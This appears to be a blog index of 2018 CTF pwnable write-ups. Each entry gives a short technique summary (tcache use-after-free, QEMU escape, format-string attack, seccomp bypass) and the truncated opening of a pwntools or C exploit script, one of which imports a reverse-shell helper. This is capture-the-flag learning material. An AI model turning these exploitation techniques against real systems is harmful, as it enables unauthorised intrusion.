
· CTF/2018
Category : pwnable Summary : wasm, bof, trigger function table index oob Exploit #!/usr/bin/python from pwn import * from paul45 import reverse_shell import requests as r URL = 'http://0:23333' def add_person(name, is_tutor): res = r.get(URL + '/add_person', params={'name':name, 'is_tutor':is_tutor}).text idx = int(res[len('create person done, person id = &#39..
· CTF/2018
Category : pwnable CLV24893 SolvesPwn me, and Prove yourself nc clv2.pwn.seccon.jp 31337 Summary : tcache, use after free Exploit#!/usr/bin/python from pwn import * def cmd_register(name): ru('[E]xit\n') sl('R') ru('name?\n') sl(name) return rl(False).split(' ')[0] def cmd_login(name): ru('[E]xit\n') sl('L') ru('User : ') sl(name) def cmd_play(): ru('[E]xit\n') sl('P') def cmd_add_prov(method, w..
· CTF/2018
Category : pwnable Summary : qemu escape Exploit#include #include #include #include #include #include #include #include #include #define OOO_ALLOCATE 0x000000 #define OOO_FREE 0x100000 #define OOO_WRITE 0x200000 #define MAP_SIZE 0x1000000 #define OOO_BIN_BASE 0x1317940 #define FREE_GOT 0x11301a0 #define OOO_MAGIC_GADGET 0x6e65f9 int fd; char *mmio; uint64_t ooo_read(uint32_t idx, uint32_t offset..
· CTF/2018
Category : pwnable Summary : uaf, tcache, show function, confusion between tcache and fastbin, 2 notes Exploit#!/usr/bin/python from pwn import * def cmd_add(data): ru('Your choice:') ss('1\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_edit(idx, data): ru('Your choice:') ss('2\x00') ru('Input the idx:') ss(str(idx)+'\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_d..
· CTF/2018
Category : pwnable secret_message 494 2 Solves Let's share a secret with us nc secret-message.pwn.seccon.jp 31337 (Hint: We allow a "little" bruteforcing to secret_message only.)Summary : ascii art, out of boundary, double staged format string attack, * precision, fread, fwrite Off by one 취약점으로 해겨해야 하는줄 알고 초반에 방향 잘못 잡았던 문제. fsb 로 취약점으로 풀이가능하다. 문제 description에서 "little" brute force를 허용해주는 것으로..
· CTF/2018
Category : pwnable Summary : race condition, heap overflow, no free, top chunk into fastbin Race condition 풀이 추가 예정 Exploit#!/usr/bin/python from pwn import * def cmd_add(times, **arg): ru('>> ') sl('1') ru('How many chunks at a time (1/2) ? ') sl(str(times)) if times == 2: # thread-1 ru('\nEnter Size 1: ') sl(str(arg['size'][0])) ru('\nEnter Author name : ') time.sleep(5) # thread-2 ru('\nEnter..
· CTF/2018
Category : pwnable Summary : heap Exploit #!/usr/bin/python from pwn import * def cmd_add(name, desc): ru('>> ') sl('1') ru('Enter name: ') sl(name) ru('Enter desc: ') if desc: sl(desc) def cmd_edit(idx, name, size, desc): ru('>> ') sl('2') ru('Enter index: ') sl(str(idx)) ru('Enter name: ') ss(name) ru('Enter size: ') sl(str(size)) ru('Enter desc: ') ss(desc) def cmd_remove(idx): ru('>> ') sl('..
· CTF/2018
Category : pwnable SimpleMemo 494 2 Solves Host: smemo.pwn.seccon.jp Port: 36384Summary : seccomp bypass, orig_rax 간만에 first blood 획득한 문제. 쓸데없는 삽질로 시간을 2배는 소요했다. google ctf 갔던 팀들이 나왔으면 못 땄을듯. 삽질 시간을 더 줄여야한다. 1. Vulnerability 1.1. Concept memo를 add/show/delete 하는 기능을 가진 바이너리. 바이너리 구조는 굉장히 간단하다. size 0x28의 heap chunk를 선언하여 사용자의 입력을 받고 해당 chunk의 주소를 memo_table에 저장한다. 1.2. OOB memo access -> arbitra..
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